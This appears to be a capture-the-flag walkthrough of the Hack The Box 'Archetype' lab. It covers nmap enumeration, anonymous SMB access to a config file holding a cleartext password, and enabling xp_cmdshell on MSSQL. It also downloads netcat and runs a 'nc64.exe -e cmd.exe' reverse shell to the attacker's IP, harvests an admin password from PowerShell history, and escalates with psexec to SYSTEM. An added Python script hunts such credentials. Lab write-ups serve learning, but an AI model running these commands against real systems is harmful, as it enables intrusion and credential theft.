01.ARCHETYPE (PRIVESC & MSSQL SERVER)

Protocols, MSSQL, SMB, Powershell, Reconnaissance, Remote Code Execution, Clear Text Credentials, Information Disclosure, Anonymous/Guest Access

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
 
 * '-sV' probes each open port for a version banner, but a banner alone is not always enough.
    - adding -sC runs Nmap's default NSE scripts on top of the version probe
       - -sC is shorthand for --script=default; that category is limited to scripts designed
         to return useful information without being intrusive or causing harm to the target
          
 * use the -Pn option of Nmap when ICMP is blocked by the Windows firewall
    - -Pn treats all hosts as online and skips host discovery, so a host that drops ping
      still gets port-scanned

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
 PORT   STATE SERVICE VERSION
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
 1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
 | ms-sql-info: 
 |   10.129.250.20:1433: 
 |     Version: 
 |       name: Microsoft SQL Server 2017 RTM
 |       number: 14.00.1000.00
 |       Product: Microsoft SQL Server 2017
 |       Service pack level: RTM
 |       Post-SP patches applied: false
 |_    TCP port: 1433
 | ms-sql-ntlm-info: 
 |   10.129.250.20:1433: 
 |     Target_Name: ARCHETYPE
 |     NetBIOS_Domain_Name: ARCHETYPE
 |     NetBIOS_Computer_Name: ARCHETYPE
 |     DNS_Domain_Name: Archetype
 |     DNS_Computer_Name: Archetype
 |_    Product_Version: 10.0.17763
 |_ssl-date: 2025-03-05T03:27:06+00:00; -1s from scanner time.
 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
 | Not valid before: 2025-03-05T03:22:42
 |_Not valid after:  2055-03-05T03:22:42
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-server-header: Microsoft-HTTPAPI/2.0
 |_http-title: Not Found
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-server-header: Microsoft-HTTPAPI/2.0
 |_http-title: Not Found
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-04T19:27:01-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-05T03:26:58
|_  start_date: N/A
|_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

 * -sC runs the default set of NSE scripts, which here supplies the service detail -sV alone
   could not: ms-sql-info, ms-sql-ntlm-info and smb-os-discovery
    - the banner-based "Windows Server 2008 R2 - 2012" guess in Service Info is wrong; the
      NTLM Product_Version and smb-os-discovery agree on build 10.0.17763, i.e. Windows
      Server 2019
    - smb-security-mode shows the script got in as guest with message signing disabled,
      an early hint that anonymous share enumeration will work
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
 PORT   STATE SERVICE
 135/tcp   filtered msrpc
 139/tcp   filtered netbios-ssn
 445/tcp   filtered microsoft-ds
 1433/tcp  filtered ms-sql-s
 5985/tcp  filtered wsman
 47001/tcp filtered winrm
 49664/tcp filtered unknown
 49665/tcp filtered unknown
 49666/tcp filtered unknown
 49667/tcp filtered unknown
 49668/tcp filtered unknown
 49669/tcp filtered unknown

 * --script=vuln runs the NSE scripts in the "vuln" category, which test the discovered
   services for specific known vulnerabilities and weak configurations
    - here every port came back "filtered": the vuln probes got no answer, so none of the
      scripts actually ran and the empty result says nothing about the patch level
    - even on open ports, no output only means no NSE check fired; it is not proof that the
      service is fully patched

FOOTHOLD

Submit user flag and root flag.
#ENUMERATE SMB SHARES
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\

 	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	
 Reconnecting with SMB1 for workgroup listing.
 do_connect: Connection to 10.129.250.20 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
 Unable to connect with SMB1 -- no workgroup available
 
 * ADMIN$ (C:\Windows) and C$ are the administrative shares; without credentials they answer
   NT_STATUS_ACCESS_DENIED, which you can verify with "smbclient -N \\\\10.129.250.20\\ADMIN$"
 * backups is a non-default share with no comment, which makes it the one worth opening first
 * the SMB1 error at the end only concerns the legacy workgroup listing; the share list above
   it came back over SMB2/3 and is complete
 * the -N flag means "no password" (null session, no prompt)
 * the -L flag lists the shares available on the target
 
 
root@htb:~$ smbclient \\\\10.129.250.20\\backups -N
 Try "help" to get a list of possible commands.
 
smb: \> dir
 .                                   D        0  Mon Jan 20 06:20:57 2020
 ..                                  D        0  Mon Jan 20 06:20:57 2020
 prod.dtsConfig                     AR      609  Mon Jan 20 06:23:02 2020

	5056511 blocks of size 4096. 2499233 blocks available
	
smb: \> get prod.dtsConfig 
 getting file \prod.dtsConfig of size 609 as prod.dtsConfig (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)

root@htb:~$ cat prod.dtsConfig 
 <DTSConfiguration>
  <DTSConfigurationHeading>
   <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
   <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
   </Configuration>
 </DTSConfiguration>
 
 * Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
    - this is an SSIS package configuration file: the connection string carries the SQL
      Server service account's password in clear text, and Persist Security Info=True tells
      the provider to keep that password in the connection object after it opens
    - Data Source=. means the package targets the local instance, i.e. the MSSQL on 1433
 
root@oco:~$ cd impacket/examples/
root@oco:~$ python3 mssqlclient.py -h
 Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
 
root@oco:~$ python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
 Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies 

 Password:
 
 [*] Encryption required, switching to TLS
 [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
 [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
 [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
 [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
 [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
 [!] Press help for extra shell commands

 * -windows-auth tells mssqlclient to authenticate with Windows (NTLM) credentials as
   ARCHETYPE\sql_svc rather than as a SQL login; the password is prompted for
    - if impacket was installed with pip, mssqlclient.py is already on PATH and the cd into
      impacket/examples is unnecessary
 
SQL (ARCHETYPE\sql_svc  dbo@master)> help
 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 enable_xp_cmdshell         - you know what it means
 disable_xp_cmdshell        - you know what it means
 xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
 sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
 ! {cmd}                    - executes a local shell cmd
#step 1: check role
SQL> SELECT is_srvrolemember('sysadmin');
 -
 1
 
 * 1 refers to boolean true, 0 refers to false
 
#step 2: check whether xp_cmdshell is enabled (it is off by default); if not, enable it
SQL> EXEC xp_cmdshell 'net user';
 ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

#step 3: enable xp_cmdshell through sp_configure; this works because sql_svc is in the sysadmin server role (step 1), exactly the condition the error above names
SQL> EXEC sp_configure 'show advanced options', 1;
 INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL> RECONFIGURE;
SQL> sp_configure;
 name                                    minimum      maximum   config_value    run_value   
 ---------------------------------   -----------   ----------   ------------   ---------- 
 xp_cmdshell                                   0            1              0            0 

SQL> EXEC sp_configure 'xp_cmdshell', 1;
 INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
 
SQL> RECONFIGURE;
 
#step 4: proceed w/ enumeration
SQL> xp_cmdshell "whoami"
 output              
 -----------------   
 archetype\sql_svc

 NULL
 
#step 5: establish stable remote shell
SQL> xp_cmdshell "powershell -c pwd"
 output                
 -------------------   
 NULL                  
 Path                  
 ----                  
 C:\Windows\system32
 
 * pick a drop location for the reverse shell binary: it must be writable by sql_svc, and
   C:\Windows\system32 (the working directory xp_cmdshell starts in, shown above) is writable
   only by administrators
    - good candidates are inside the service account's own profile:
       - C:\Users\sql_svc\Downloads
       - C:\Users\sql_svc\AppData\Local\Temp
 
root@oco:~$ BROWSER > https://github.com/int0x33/nc.exe/blob/master/nc64.exe > Download RAW
 
 * place the raw executable in ~/Downloads
 * this is a third-party prebuilt binary; record its hash (sha256sum nc64.exe) before using
   it so you know exactly what you put on the target

root@oco:~$ sudo python3 -m http.server 8080

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; Invoke-WebRequest http://10.10.14.215:8080/nc64.exe -outfile nc64.exe"

 * powershell -c (short for -Command) runs the quoted string as a PowerShell command
 * Invoke-WebRequest downloads the file; in Windows PowerShell 5.1 the aliases wget, curl
   and iwr all resolve to it
 * 10.10.14.215:8080 is the attacker's payload server (the python http.server started above)
 * xp_cmdshell runs the command as the SQL Server service account, so the file lands with
   sql_svc's permissions, which is why the Downloads folder of that profile works
 
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
 output                                                                             
 --------------------------------------------------------------------------------   
 NULL                                                                               
 Directory: C:\Users\sql_svc\Downloads                                          
 NULL                                                                               
 Mode                LastWriteTime         Length Name                                                                     
 ----                -------------         ------ ----                                                                     
 -a----         3/8/2025   6:58 AM         226042 nc64.exe 

root@oco:~$ sudo nc -nlvp 443

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.215 443"

 * this runs the uploaded nc64.exe on the target with -e cmd.exe, which spawns cmd.exe and
   wires its stdin/stdout to a TCP connection back to the attacker's listener
 * 10.10.14.215 is the attacker's IP, where a netcat listener is waiting on port 443
    - 443 is chosen because outbound HTTPS is rarely blocked by egress filtering
 
root@oco:~$ nc....
 listening on [any] 443 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.163.160] 49677
 Microsoft Windows [Version 10.0.17763.2061]
 (c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads> dir ..\Desktop
 dir ..\Desktop
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Desktop

  01/20/2020  05:42 AM    <DIR>          .
  01/20/2020  05:42 AM    <DIR>          ..
  02/25/2020  06:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,720,813,056 bytes free

C:\Users\sql_svc\Downloads>type ..\Desktop\user.txt
 type ..\Desktop\user.txt
 3e7b102e78218e935bf3f4951fec21a3
#enumerate and identify privesc vulnerabilities
root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
 
 * place the raw executable in ~/Downloads
 
root@htb:~$ sudo python3 -m http.server 8080
 
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
 powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe

C:\Users\sql_svc\Downloads>dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Downloads

  03/08/2025  08:54 AM    <DIR>          .
  03/08/2025  08:54 AM    <DIR>          ..
  03/08/2025  07:12 AM            45,272 nc64.exe
  03/08/2025  08:54 AM         1,930,752 winPEASx64.exe
               2 File(s)      1,976,024 bytes
               2 Dir(s)  10,714,357,760 bytes free


C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
 ╔══════════╣ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000

 ...
 ╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 79B
 ...
 ╔══════════╣ Current Token privileges
 ╚ Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
    SeAssignPrimaryTokenPrivilege: DISABLED
    SeIncreaseQuotaPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
 ...
 ╔══════════╣ Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT
 ...
 
 * SeImpersonatePrivilege is enabled, the usual prerequisite for the potato-family
   token-impersonation escalations; keep it as a fallback route
 * the NetNTLMv2 line is already in hashcat -m 5600 layout (user::domain:challenge:NTProofStr:blob);
   the challenge 1122334455667788 is a fixed value chosen by the tool, so the hash is crackable
   offline, but sql_svc's password is already known so it adds nothing here
 * the quicker lead is the 79-byte PSReadLine history file, which winPEAS lists twice
 
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

 01/20/2020  05:04 AM    <DIR>          .
 01/20/2020  05:04 AM    <DIR>          ..
 03/17/2020  01:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes
               2 Dir(s)  10,713,939,968 bytes free
 
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
 exit
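
 * Added example (not part of this walkthrough): both credentials on this box came out of
   files that were never meant to be secrets, the SSIS prod.dtsConfig on the backups share and
   the PSReadLine ConsoleHost_history.txt above. The Python below pulls credentials out of both
   formats so the check can be repeated over any pile of collected files. The inputs are
   constructed copies of the two files from the page, with an extra no-password connection
   and two extra history lines added to exercise the edge cases; file names are assumptions.

```python
"""Hunt cleartext credentials in SSIS .dtsConfig files and PSReadLine history.

Added example, not the walkthrough's own code. Inputs are constructed copies of
the artefacts shown on the page plus a few extra lines to cover edge cases.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass(frozen=True)
class Credential:
    source: str
    user: str
    secret: str
    context: str


def parse_connection_string(cs):
    """Split 'Key=Value;...' into a lower-cased dict; values may contain '='."""
    out = {}
    for part in cs.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            out[k.strip().lower()] = v.strip()
    return out


# Key names used for the password / user by OLE DB, ODBC and ADO.NET providers.
PASSWORD_KEYS = ("password", "pwd")
USER_KEYS = ("user id", "uid", "user")


def creds_from_dtsconfig(xml_text, source="prod.dtsConfig"):
    found = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        kv = parse_connection_string(cfg.findtext("ConfiguredValue") or "")
        pw = next((kv[k] for k in PASSWORD_KEYS if k in kv), None)
        if pw is None:
            continue  # integrated security or no credential at all
        user = next((kv[k] for k in USER_KEYS if k in kv), "<unknown>")
        ctx = f"{cfg.get('Path', '')}; Data Source={kv.get('data source', '?')}"
        if kv.get("persist security info", "").lower() == "true":
            ctx += "; Persist Security Info=True"
        found.append(Credential(source, user, pw, ctx))
    return found


# Inline-password command forms that end up in ConsoleHost_history.txt.
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<pw>\S+)", re.I)
CMDKEY_RE = re.compile(r"\bcmdkey\b.*?/user:(?P<user>\S+).*?/pass:(?P<pw>\S+)", re.I)


def creds_from_ps_history(text, source="ConsoleHost_history.txt"):
    found = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rx in (NET_USE_RE, CMDKEY_RE):
            m = rx.search(line)
            if not m:
                continue
            pw = m["pw"]
            if pw == "*" or pw.startswith("/"):
                continue  # password was prompted for, or the next token is another switch
            found.append(Credential(source, m["user"], pw, f"line {lineno}: {line.strip()}"))
            break
    return found


def hunt(dtsconfig_xml, history_text):
    return creds_from_dtsconfig(dtsconfig_xml) + creds_from_ps_history(history_text)


def redact(secret, keep=2):
    """For reports: keep a short prefix so findings can be matched without copying the secret."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


# Constructed from the page's prod.dtsConfig, plus an integrated-security connection.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
 <DTSConfigurationHeading>
  <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
 </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
   <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Audit].Properties[ConnectionString]" ValueType="String">
   <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Audit;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Constructed from the page's history file, plus a prompt-style net use and a cmdkey line.
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
net use Z: \\fs01\share /user:ARCHETYPE\svc_backup /persistent:no
cmdkey /add:fs01 /user:ARCHETYPE\backup_op /pass:Hunter2!
exit
"""

if __name__ == "__main__":
    for c in hunt(SAMPLE_DTSCONFIG, SAMPLE_HISTORY):
        print(f"[{c.source}] {c.user} : {redact(c.secret)}  ({c.context})")
```

   The second net use line is the reason for the guard on the password token: with
   /persistent:no following /user: there is no inline password, and a naive regex would report
   the switch as the secret.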
#escalate privileges
root@htb:~$ python3 psexec.py administrator@{TARGET_IP}
 Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies 

 Password: MEGACORP_4dm1n!!
 
 [*] Requesting shares on 10.129.241.250.....
 [*] Found writable share ADMIN$
 [*] Uploading file yQzLFkqG.exe
 [*] Opening SVCManager on 10.129.241.250.....
 [*] Creating service pQUO on 10.129.241.250.....
 [*] Starting service pQUO.....
 [!] Press help for extra shell commands
 Microsoft Windows [Version 10.0.17763.2061]
 (c) 2018 Microsoft Corporation. All rights reserved.

 * the password can also be passed inline as administrator:'MEGACORP_4dm1n!!'@{TARGET_IP}, but
   it must be single-quoted because "!!" triggers history expansion in bash; leaving it off and
   typing it at the prompt, as above, also keeps it out of shell history
 * psexec.py is noisy: it uploads a randomly named binary to ADMIN$ and installs and starts a
   service with a random name (yQzLFkqG.exe / pQUO above), which lands in the System event log
   as a service installation (Event ID 7045); the binary is removed on a clean exit, so do not
   just kill the session

C:\Windows\system32> whoami
  nt authority\system
 
C:\Windows\system32> cd c:\users
C:\Users> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of c:\Users

 01/19/2020  03:10 PM    <DIR>          .
 01/19/2020  03:10 PM    <DIR>          ..
 01/19/2020  10:39 PM    <DIR>          Administrator
 01/19/2020  10:39 PM    <DIR>          Public
 01/20/2020  05:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  10,695,737,344 bytes free

C:\Users> cd c:\users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of c:\Users\Administrator\Desktop

 07/27/2021  01:30 AM    <DIR>          .
 07/27/2021  01:30 AM    <DIR>          ..
 02/25/2020  06:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,695,774,208 bytes free
       
C:\Users\Administrator\Desktop> type root.txt
 b91ccec3305e98240082d4474b848528      
